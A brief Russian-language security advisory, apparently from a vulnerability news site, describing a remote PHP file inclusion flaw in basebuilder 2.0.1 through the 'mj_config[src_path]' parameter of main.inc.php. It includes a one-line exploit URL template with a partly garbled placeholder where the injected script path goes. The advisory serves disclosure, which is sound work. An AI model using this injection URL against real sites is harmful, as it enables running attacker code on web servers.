Программа: basebuilder 2.0.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «mj_config[src_path]» сценарием main.inc.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.

Эксплоит:

http://site.com/basebuilder/src/main.inc.php?mj_config[src_path]=[spread???]



Оставить мнение